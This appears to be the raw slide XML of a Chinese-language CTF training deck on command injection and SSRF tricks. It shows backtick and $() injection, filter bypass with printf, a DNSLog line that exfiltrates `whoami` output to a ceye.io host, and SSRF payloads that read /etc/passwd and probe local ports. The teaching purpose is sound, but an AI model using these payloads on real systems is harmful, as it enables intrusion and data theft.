            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>技巧</a:t>
            </a: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525657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$()</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>``</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E7FA427-C2EC-444F-B15E-B533B106DC7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1691640"/>
            <a:ext cx="6146800" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>结合</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>使用，可以绕过一些限制</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F55D95A7-3DE1-CE41-AB5D-C98BADA1A1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39" y="2580640"/>
            <a:ext cx="10559855" cy="695960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03A83F67-8F8C-C04F-AF90-5E086BE6D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38" y="3810844"/>
            <a:ext cx="10559856" cy="715436"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21943715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DNSLog</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1784"/>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介绍</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7904DD8-C859-964B-AFCB-AB416AD0F1DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1112520" y="1704446"/>
            <a:ext cx="10408920" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>`whoami`. rg1ido.ceye.io</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63E80602-6E24-414F-9F34-5A661CE19072}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="1875" r="24125" b="13456"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="843280" y="2166111"/>
            <a:ext cx="10379436" cy="4691889"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="直线连接符 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41C67A25-6396-324C-ACBF-CCDEA5B9902F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="5577840"/>
            <a:ext cx="15392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椭圆形标注 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{544ADC64-5CDD-FF42-B28F-DABCA5A72059}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6659880" y="1582005"/>
            <a:ext cx="3169920" cy="1481235"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A8F0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s" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>某些没有回显的场景，可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>请求带出数据</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>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250223698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9000" y="172720"/>
            <a:ext cx="5367020" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>练习</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0701C6D6-768F-BE4F-A284-A808556F5655}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563880" y="1082040"/>
            <a:ext cx="7482840" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="3200" b="1" dirty="0"/>
              <a:t>http://web.jarvisoj.com:32798/</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="416269279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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trick</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1784"/>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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>介绍</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{160EEDF9-75D5-DA49-9A5F-7D6B41BF7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630" y="2852419"/>
            <a:ext cx="7165340" cy="3632661"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7904DD8-C859-964B-AFCB-AB416AD0F1DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1112520" y="1704446"/>
            <a:ext cx="10408920" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>服务器获取用户传入的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>，并访问，如果不加过滤，可能导致内网探测、文件读取、攻击内网服务等</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86687972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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trick</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1784"/>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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>介绍</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7904DD8-C859-964B-AFCB-AB416AD0F1DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1112520" y="1704446"/>
            <a:ext cx="10408920" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>常出现在离线下载，站长工具，远程头像上传等功能中</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{039F7E05-C41A-004E-A60F-03021260C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513330"/>
            <a:ext cx="7086600" cy="3721100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63414487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所需知识</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CE3915F-2A63-1743-A167-096F6DE68D95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1376680" y="2453640"/>
            <a:ext cx="8803640" cy="2239844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>请求、响应流程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>浏览器插件（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2400"/>
              <a:t>）：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Firebug</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2400"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Tamper Data</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2400"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Hackbar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>工具：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2400"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DC65920-AE23-F743-BEB7-15325996284E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716280" y="1005840"/>
            <a:ext cx="5044440" cy="681725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>一、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>抓包</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>修改</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1"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74413156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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trick</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1784"/>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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件读取，内网探测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F77A7CDD-13AB-A748-A7AE-20AA14859333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1158240" y="1920240"/>
            <a:ext cx="7117080" cy="1305101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0"/>
              <a:t>file:///etc/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0"/>
              <a:t>dict://127.0.0.1:3306</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14316246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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trick</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1784"/>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SSRF</a:t>
            </a:r>
            <a:r>
